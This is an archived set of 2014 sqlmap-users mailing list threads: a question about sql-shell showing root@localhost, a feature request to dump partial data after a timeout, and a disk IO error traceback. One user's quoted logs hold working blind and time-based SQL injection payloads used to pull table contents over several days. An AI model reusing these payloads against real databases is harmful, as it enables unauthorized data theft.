On Tue, Jul 22, 2014 at 4:53 AM, Sharma, Vivek <viv...@bl...>
wrote:

>   Hi All,
>
>
>
> While trying out the sql shell option, I saw that sql-map spawns a
> sql-shell for me, great!
>
>
>
> The vulnerable application was running on a low privileged account, not
> root@localhost. But when I did
>
>
>
> sql-shell>select user()
>
>
>
> It tells me the user is *root@localhost*.
>
>
>
> Is it that sql-map opens up a shell with a root account, irrespective of
> the account application is running on. Seems unrealistic though.
>
>
>
> If not what could be the possible reason?
>
>
>
> Regards
>
> Vivek Sharma
>
> THIS MESSAGE AND ANY ATTACHMENTS ARE CONFIDENTIAL, PROPRIETARY, AND MAY BE
> PRIVILEGED. If this message was misdirected, BlackRock, Inc. and its
> subsidiaries, ("BlackRock") does not waive any confidentiality or
> privilege. If you are not the intended recipient, please notify us
> immediately and destroy the message without disclosing its contents to
> anyone. Any distribution, use or copying of this e-mail or the information
> it contains by other than an intended recipient is unauthorized. The views
> and opinions expressed in this e-mail message are the author's own and may
> not reflect the views and opinions of BlackRock, unless the author is
> authorized by BlackRock to express such views or opinions on its behalf.
> All email sent to or from this address is subject to electronic storage and
> review by BlackRock. Although BlackRock operates anti-virus programs, it
> does not accept responsibility for any damage whatsoever caused by viruses
> being passed.
>
>
> ------------------------------------------------------------------------------
> Want fast and easy access to all the code in your enterprise? Index and
> search up to 200,000 lines of code with a free copy of Black Duck
> Code Sight - the same software that powers the world's largest code
> search on Ohloh, the Black Duck Open Hub! Try it now.
> http://p.sf.net/sfu/bds
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[sqlmap-users] sql-shell option

[Sharma, V. <viv...@bl...>]

Hi All,

While trying out the sql shell option, I saw that sql-map spawns a sql-shell for me, great!

The vulnerable application was running on a low privileged account, not root@localhost. But when I did

sql-shell>select user()

It tells me the user is root@localhost.

Is it that sql-map opens up a shell with a root account, irrespective of the account application is running on. Seems unrealistic though.

If not what could be the possible reason?

Regards
Vivek Sharma

THIS MESSAGE AND ANY ATTACHMENTS ARE CONFIDENTIAL, PROPRIETARY, AND MAY BE PRIVILEGED. If this message was misdirected, BlackRock, Inc. and its subsidiaries, ("BlackRock") does not waive any confidentiality or privilege. If you are not the intended recipient, please notify us immediately and destroy the message without disclosing its contents to anyone. Any distribution, use or copying of this e-mail or the information it contains by other than an intended recipient is unauthorized. The views and opinions expressed in this e-mail message are the author's own and may not reflect the views and opinions of BlackRock, unless the author is authorized by BlackRock to express such views or opinions on its behalf. All email sent to or from this address is subject to electronic storage and review by BlackRock. Although BlackRock operates anti-virus programs, it does not accept responsibility for any damage whatsoever caused by viruses being passed.

Re: [sqlmap-users] dump data after timeout condition

[Miroslav S. <mir...@gm...>]

IMO, problem with immediate table dump after a timeout could be that the
average user would falsely think that everything went ok.

I would really suggest you to find out why all of a sudden the are
timeouts.

Bye
On Jul 15, 2014 12:42 PM, "Dirk Wetter" <sp...@dr...> wrote:

>  Hi Miroslav,
>
> Am 07/14/2014 08:56 PM, schrieb Miroslav Stampar:
>
> Hi Dirk.
>
>  sqlmap doesn't retrieve already retrieved data. It stores them into the
> local session data for later (re)usage.
>
>
> I thought so too. But when for some reason the network times out or any
> other special circumstances occur
> it would be great if sqlmap would just dump immediately what it retrieved
> so far. I started it again afterwards,
> hoping after ^C it would dump the whole data then but it  dumped 1-2 lines
> only.
>
>
>  "boolean-based blind vulnerability and I tried to retrieve a few tables
> with big chunks of data" -> I would expect your problem in union SQLI, but
> not boolean-based blind.
>
>
> nope, definitely it's a boolean based  blind and at the same time (same
> variable) a time-based blind vulnerability I am exploiting.
> During this run I left sqlmap the choice which one to exploit. Previously
> I thought I restricted it to use
> --technique=B .
>
>
>  Please make sure that:
> 1) you are running the latest revision from our Github repository
>
>
> check (ok, from last week)
>
>  2) that target is not having some kind of WAF protection mechanism that
> does the hard drop of requests
>
>
> check (definitely network issue). But I didn't run wireshark or so, so I
> can't tell whether a TCP RST was sent
> from a party in between.
>
>
>  As said, I don't see a reason why would sqlmap fail here. It would be
> great if you could isolate "problematic" payload with usage of -v 3 and try
> it inside the browser (to see what's happening)
>
>
> Miroslav, I can only report what I observed :-) Data retrieval on this
> special table was running for ~3 days.
> I retrieved numerous other tables the week before (exactly the same
> vulnerability) and I am really certain the
> original cause of the hiccup was just a network outage.
>
> The last famous words before bail out were:
>
> [09:54:15] [INFO] retrieving the length of query output
> [09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT
> IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY
> id LIMIT 21,1),1,1))>51 AND (7548=7548
> [09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT
> IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY
> id LIMIT 21,1),1,1))>48 AND (7548=7548
> [09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT
> IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id
> LIMIT 21,1),1,1))>1 AND (7548=7548
> [09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT
> IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY
> id LIMIT 21,1),1,1))>47 AND (7548=7548
> [09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT
> IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id
> LIMIT 21,1),2,1))>51 AND (7548=7548
> [09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT
> IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY
> id LIMIT 21,1),2,1))>48 AND (7548=7548
> [09:54:17] [PAYLOAD] 2885) AND ORD(MID((SELECT
> IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY
> id LIMIT 21,1),2,1))>1 AND (7548=7548
> [09:54:17] [INFO] retrieved: 0
> [09:54:17] [DEBUG] performed 7 queries in 2.11 seconds
> [09:54:17] [DEBUG] performed 0 queries in 2.12 seconds
> [09:54:17] [PAYLOAD] 2885) AND 6853=IF((ORD(MID((SELECT IFNULL(CAST(<row>
> AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT
> 21,1),1,1))>64),SLEEP(5),6853) AND (5650=5650
> [09:54:19] [PAYLOAD] 2885) AND 6853=IF((ORD(MID((SELECT IFNULL(CAST(<row>
> AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT
> 21,1),1,1))>32),SLEEP(5),6853) AND (5650=5650
> [09:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
> is going to retry the request
> [09:54:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
> is going to retry the request
> [09:54:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
> is going to retry the request
> [09:54:22] [INFO] fetching columns for table <table> in database <db>
> [09:54:22] [PAYLOAD] 2885) AND ORD(MID((SELECT
> IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM
> INFORMATION_SCHEMA.COLUMNS WHERE table_name=<hexstr1> AND
> table_schema=<hexstr2>),1,1))>51 AND (1291=1291
> [09:54:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
> is going to retry the request
> [09:54:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
> is going to retry the request
> [09:54:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
> is going to retry the request
> [09:54:25] [CRITICAL] unable to connect to the target URL or proxy
> [09:54:25] [WARNING] HTTP error codes detected during run:
>
> 500 (Internal Server Error) - 36 times, 503 (Service Unavailable) - 2 times
>
> [*] shutting down at 09:54:25
>
>
> I won't be able to reproduce it, sorry. ;-/ My point is a feature request:
> if an error condition occurs, sqlmap
> should better dump immediately the data it already retrieved, in csv
> format.
>
>
> Cheers,
>
> Dirk
>
> PS: I didn't modify any timeout or retry values, so normally I would
> expect sqlmap at least 3x30 seconds before bail out, correct?
>
>
>

Re: [sqlmap-users] dump data after timeout condition

[Dirk W. <sp...@dr...>]

Hi Miroslav,

Am 07/14/2014 08:56 PM, schrieb Miroslav Stampar:
> Hi Dirk.
>
> sqlmap doesn't retrieve already retrieved data. It stores them into the local session data for later (re)usage.

I thought so too. But when for some reason the network times out or any other special circumstances occur
it would be great if sqlmap would just dump immediately what it retrieved so far. I started it again afterwards,
hoping after ^C it would dump the whole data then but it  dumped 1-2 lines only.

>
> "boolean-based blind vulnerability and I tried to retrieve a few tables with big chunks of data" -> I would expect your problem in union SQLI, but not boolean-based blind.

nope, definitely it's a boolean based  blind and at the same time (same variable) a time-based blind vulnerability I am exploiting.
During this run I left sqlmap the choice which one to exploit. Previously I thought I restricted it to use
--technique=B .
>
> Please make sure that:
> 1) you are running the latest revision from our Github repository

check (ok, from last week)

> 2) that target is not having some kind of WAF protection mechanism that does the hard drop of requests

check (definitely network issue). But I didn't run wireshark or so, so I can't tell whether a TCP RST was sent
from a party in between.

>
> As said, I don't see a reason why would sqlmap fail here. It would be great if you could isolate "problematic" payload with usage of -v 3 and try it inside the browser (to see what's happening)

Miroslav, I can only report what I observed :-) Data retrieval on this special table was running for ~3 days.
I retrieved numerous other tables the week before (exactly the same vulnerability) and I am really certain the
original cause of the hiccup was just a network outage.

The last famous words before bail out were:

[09:54:15] [INFO] retrieving the length of query output
[09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),1,1))>51 AND (7548=7548
[09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),1,1))>48 AND (7548=7548
[09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>1 AND (7548=7548
[09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),1,1))>47 AND (7548=7548
[09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),2,1))>51 AND (7548=7548
[09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),2,1))>48 AND (7548=7548
[09:54:17] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),2,1))>1 AND (7548=7548
[09:54:17] [INFO] retrieved: 0
[09:54:17] [DEBUG] performed 7 queries in 2.11 seconds
[09:54:17] [DEBUG] performed 0 queries in 2.12 seconds
[09:54:17] [PAYLOAD] 2885) AND 6853=IF((ORD(MID((SELECT IFNULL(CAST(<row> AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>64),SLEEP(5),6853) AND (5650=5650
[09:54:19] [PAYLOAD] 2885) AND 6853=IF((ORD(MID((SELECT IFNULL(CAST(<row> AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>32),SLEEP(5),6853) AND (5650=5650
[09:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:22] [INFO] fetching columns for table <table> in database <db>
[09:54:22] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=<hexstr1> AND table_schema=<hexstr2>),1,1))>51 AND (1291=1291
[09:54:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:25] [CRITICAL] unable to connect to the target URL or proxy
[09:54:25] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 36 times, 503 (Service Unavailable) - 2 times

[*] shutting down at 09:54:25


I won't be able to reproduce it, sorry. ;-/ My point is a feature request: if an error condition occurs, sqlmap
should better dump immediately the data it already retrieved, in csv format.


Cheers,

Dirk

PS: I didn't modify any timeout or retry values, so normally I would expect sqlmap at least 3x30 seconds before bail out, correct?

Re: [sqlmap-users] dump data after timeout condition

[Miroslav S. <mir...@gm...>]

Hi Dirk.

sqlmap doesn't retrieve already retrieved data. It stores them into the
local session data for later (re)usage.

"boolean-based blind vulnerability and I tried to retrieve a few tables
with big chunks of data" -> I would expect your problem in union SQLI, but
not boolean-based blind.

Please make sure that:
1) you are running the latest revision from our Github repository
2) that target is not having some kind of WAF protection mechanism that
does the hard drop of requests

As said, I don't see a reason why would sqlmap fail here. It would be great
if you could isolate "problematic" payload with usage of -v 3 and try it
inside the browser (to see what's happening)

Kind regards,
Miroslav Stampar


On Mon, Jul 14, 2014 at 12:29 PM, Dirk Wetter <sp...@dr...> wrote:

>
> Hi Sharma,
>
>
> Am 07/14/2014 12:06 PM, schrieb Sharma, Vivek:
>
> Hi Dirk,
>
>
> Try adding --authorization header to the cmd options. It worked for me as well. I was having the same issue as well.
>
>
>
> thx but my problem was a network timeout.
>
>
> Next time I will increase the timeout and retry value  but still I though
> it
> would be great in general if sqlmap would dump the already retrieved data
> if a problem similar to mine occurs.
>
> Cheers, Dirk
>
>
>
>
>
>
> -----Original Message-----
> From: Dirk Wetter [mailto:sp...@dr... <sp...@dr...>]
> Sent: Monday, July 14, 2014 3:13 PM
> To: sql...@li...
> Subject: [sqlmap-users] dump data after timeout condition
>
>
> Hi,
>
> sorry if I missed something but wouldn't it make sense to dump already retrieved data if sqlmap is encountering a timeout beyond the specified/ default value?
>
> [09:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:22] [CRITICAL] connection exception detected in dumping phase: 'unable to connect to the target URL or proxy'
> [..2 lines of private output omitted...] [09:54:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:25] [CRITICAL] unable to connect to the target URL or proxy [09:54:25] [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 36 times, 503 (Service Unavailable) - 2 times
>
> [*] shutting down at 09:54:25
>
>
> My specific case was a boolean-based blind vulnerability and I tried to retrieve a few tables with big chunks of data.
> It was running for >2 days already.
>
>
> Cheers,
>
> Dirk
>
>
>
>
>
> ------------------------------------------------------------------------------
> Want fast and easy access to all the code in your enterprise? Index and search up to 200,000 lines of code with a free copy of Black Duck&#174; Code Sight&#153; - the same software that powers the world's largest code search on Ohloh, the Black Duck Open Hub! Try it now.http://p.sf.net/sfu/bds
> _______________________________________________
> sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> THIS MESSAGE AND ANY ATTACHMENTS ARE CONFIDENTIAL, PROPRIETARY, AND MAY BE PRIVILEGED. If this message was misdirected, BlackRock, Inc. and its subsidiaries, ("BlackRock") does not waive any confidentiality or privilege. If you are not the intended recipient, please notify us immediately and destroy the message without disclosing its contents to anyone. Any distribution, use or copying of this e-mail or the information it contains by other than an intended recipient is unauthorized. The views and opinions expressed in this e-mail message are the author's own and may not reflect the views and opinions of BlackRock, unless the author is authorized by BlackRock to express such views or opinions on its behalf. All email sent to or from this address is subject to electronic storage and review by BlackRock. Although BlackRock operates anti-virus programs, it does not accept responsibility for any damage whatsoever caused by viruses being passed.
>
>
>
>
>
> ------------------------------------------------------------------------------
> Want fast and easy access to all the code in your enterprise? Index and
> search up to 200,000 lines of code with a free copy of Black Duck&#174;
> Code Sight&#153; - the same software that powers the world's largest code
> search on Ohloh, the Black Duck Open Hub! Try it now.
> http://p.sf.net/sfu/bds
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] dump data after timeout condition

[Dirk W. <sp...@dr...>]

<html>
  <head>
    <meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
  </head>
  <body bgcolor="#FFFFFF" text="#000000">
    <div class="moz-cite-prefix"><br>
      Hi Sharma,<br>
      <br>
      <br>
      Am 07/14/2014 12:06 PM, schrieb Sharma, Vivek:<br>
    </div>
    <blockquote
cite="mid:C11...@US..."
      type="cite">
      <pre wrap="">Hi Dirk,


Try adding --authorization header to the cmd options. It worked for me as well. I was having the same issue as well.</pre>
    </blockquote>
    <br>
    <br>
    thx but my problem was a network timeout.<br>
    <br>
    <br>
    Next time I will increase the timeout and retry value  but still I
    though it<br>
    would be great in general if sqlmap would dump the already retrieved
    data<br>
    if a problem similar to mine occurs.<br>
    <br>
    Cheers, Dirk<br>
    <br>
    <br>
    <br>
    <blockquote
cite="mid:C11...@US..."
      type="cite">
      <pre wrap="">


-----Original Message-----
From: Dirk Wetter [<a class="moz-txt-link-freetext" href="mailto:sp...@dr...">mailto:sp...@dr...</a>] 
Sent: Monday, July 14, 2014 3:13 PM
To: <a class="moz-txt-link-abbreviated" href="mailto:sql...@li...">sql...@li...</a>
Subject: [sqlmap-users] dump data after timeout condition


Hi,

sorry if I missed something but wouldn't it make sense to dump already retrieved data if sqlmap is encountering a timeout beyond the specified/ default value?

[09:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:22] [CRITICAL] connection exception detected in dumping phase: 'unable to connect to the target URL or proxy'
[..2 lines of private output omitted...] [09:54:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:25] [CRITICAL] unable to connect to the target URL or proxy [09:54:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 36 times, 503 (Service Unavailable) - 2 times

[*] shutting down at 09:54:25


My specific case was a boolean-based blind vulnerability and I tried to retrieve a few tables with big chunks of data.
It was running for &gt;2 days already.


Cheers,

Dirk





------------------------------------------------------------------------------
Want fast and easy access to all the code in your enterprise? Index and search up to 200,000 lines of code with a free copy of Black Duck&amp;#174; Code Sight&amp;#153; - the same software that powers the world's largest code search on Ohloh, the Black Duck Open Hub! Try it now.
<a class="moz-txt-link-freetext" href="http://p.sf.net/sfu/bds">http://p.sf.net/sfu/bds</a>
_______________________________________________
sqlmap-users mailing list
<a class="moz-txt-link-abbreviated" href="mailto:sql...@li...">sql...@li...</a>
<a class="moz-txt-link-freetext" href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a>

THIS MESSAGE AND ANY ATTACHMENTS ARE CONFIDENTIAL, PROPRIETARY, AND MAY BE PRIVILEGED. If this message was misdirected, BlackRock, Inc. and its subsidiaries, ("BlackRock") does not waive any confidentiality or privilege. If you are not the intended recipient, please notify us immediately and destroy the message without disclosing its contents to anyone. Any distribution, use or copying of this e-mail or the information it contains by other than an intended recipient is unauthorized. The views and opinions expressed in this e-mail message are the author's own and may not reflect the views and opinions of BlackRock, unless the author is authorized by BlackRock to express such views or opinions on its behalf. All email sent to or from this address is subject to electronic storage and review by BlackRock. Although BlackRock operates anti-virus programs, it does not accept responsibility for any damage whatsoever caused by viruses being passed.

</pre>
    </blockquote>
    <br>
  </body>
</html>

Re: [sqlmap-users] dump data after timeout condition

[Sharma, V. <viv...@bl...>]

Hi Dirk,


Try adding --authorization header to the cmd options. It worked for me as well. I was having the same issue as well.

Regards
Vivek Sharma

-----Original Message-----
From: Dirk Wetter [mailto:sp...@dr...] 
Sent: Monday, July 14, 2014 3:13 PM
To: sql...@li...
Subject: [sqlmap-users] dump data after timeout condition


Hi,

sorry if I missed something but wouldn't it make sense to dump already retrieved data if sqlmap is encountering a timeout beyond the specified/ default value?

[09:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:22] [CRITICAL] connection exception detected in dumping phase: 'unable to connect to the target URL or proxy'
[..2 lines of private output omitted...] [09:54:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request [09:54:25] [CRITICAL] unable to connect to the target URL or proxy [09:54:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 36 times, 503 (Service Unavailable) - 2 times

[*] shutting down at 09:54:25


My specific case was a boolean-based blind vulnerability and I tried to retrieve a few tables with big chunks of data.
It was running for >2 days already.


Cheers,

Dirk





------------------------------------------------------------------------------
Want fast and easy access to all the code in your enterprise? Index and search up to 200,000 lines of code with a free copy of Black Duck® Code Sight™ - the same software that powers the world's largest code search on Ohloh, the Black Duck Open Hub! Try it now.
http://p.sf.net/sfu/bds
_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

THIS MESSAGE AND ANY ATTACHMENTS ARE CONFIDENTIAL, PROPRIETARY, AND MAY BE PRIVILEGED. If this message was misdirected, BlackRock, Inc. and its subsidiaries, ("BlackRock") does not waive any confidentiality or privilege. If you are not the intended recipient, please notify us immediately and destroy the message without disclosing its contents to anyone. Any distribution, use or copying of this e-mail or the information it contains by other than an intended recipient is unauthorized. The views and opinions expressed in this e-mail message are the author's own and may not reflect the views and opinions of BlackRock, unless the author is authorized by BlackRock to express such views or opinions on its behalf. All email sent to or from this address is subject to electronic storage and review by BlackRock. Although BlackRock operates anti-virus programs, it does not accept responsibility for any damage whatsoever caused by viruses being passed.

[sqlmap-users] dump data after timeout condition

[Dirk W. <sp...@dr...>]

Hi,

sorry if I missed something but wouldn't it make sense to dump already
retrieved data if sqlmap is encountering a timeout beyond the specified/
default value?

[09:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:22] [CRITICAL] connection exception detected in dumping phase: 'unable to connect to the target URL or proxy'
[..2 lines of private output omitted...]
[09:54:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:25] [CRITICAL] unable to connect to the target URL or proxy
[09:54:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 36 times, 503 (Service Unavailable) - 2 times

[*] shutting down at 09:54:25


My specific case was a boolean-based blind vulnerability and I tried to retrieve a few tables with big chunks of data.
It was running for >2 days already.


Cheers,

Dirk

Re: [sqlmap-users] ERROR in SQLMAP

[Miroslav S. <mir...@gm...>]

Hi Alex.

This looks like you had some disk IO issue. Are you able to reproduce this?

Kind regards,
Miroslav Stampar


On Fri, Jul 11, 2014 at 3:46 AM, Alex Gerth <ger...@gm...> wrote:

> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u **************************************** --dbs
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap", line 95, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 364, in start
>     if not checkConnection(suppressOutput=conf.forms) or not checkString()
> or not checkRegexp():
>   File "/usr/share/sqlmap/lib/controller/checks.py", line 1213, in
> checkConnection
>     page, _ = Request.queryPage(content=True, noteResponseTime=False)
>   File "/usr/share/sqlmap/lib/request/connect.py", line 894, in queryPage
>     page, headers, code = Connect.getPage(url=uri, get=get, post=post,
> cookie=cookie, ua=ua, referer=referer, host=host, silent=silent,
> method=method, auxHeaders=auxHeaders, response=response, raise404=raise404,
> ignoreTimeout=timeBasedCompare)
>   File "/usr/share/sqlmap/lib/request/connect.py", line 573, in getPage
>     processResponse(page, responseHeaders)
>   File "/usr/share/sqlmap/lib/request/basic.py", line 303, in
> processResponse
>     parseResponse(page, responseHeaders if kb.processResponseCounter <
> PARSE_HEADERS_LIMIT else None)
>   File "/usr/share/sqlmap/lib/request/basic.py", line 122, in parseResponse
>     headersParser(headers)
>   File "/usr/share/sqlmap/lib/parse/headers.py", line 43, in headersParser
>     parseXmlFile(xmlfile, handler)
>   File "/usr/share/sqlmap/lib/core/common.py", line 1672, in parseXmlFile
>     with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as
> stream:
>   File "/usr/share/sqlmap/lib/core/common.py", line 1728, in
> readCachedFileContent
>     kb.cache.content[filename] = f.read()
>   File "/usr/lib/python2.7/codecs.py", line 671, in read
>     return self.reader.read(size)
>   File "/usr/lib/python2.7/codecs.py", line 471, in read
>     newdata = self.stream.read()
> IOError: [Errno 5] Input/output error
>
>
>
>
> ------------------------------------------------------------------------------
> Open source business process management suite built on Java and Eclipse
> Turn processes into business applications with Bonita BPM Community Edition
> Quickly connect people, data, and systems into organized workflows
> Winner of BOSSIE, CODIE, OW2 and Gartner awards
> http://p.sf.net/sfu/Bonitasoft
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm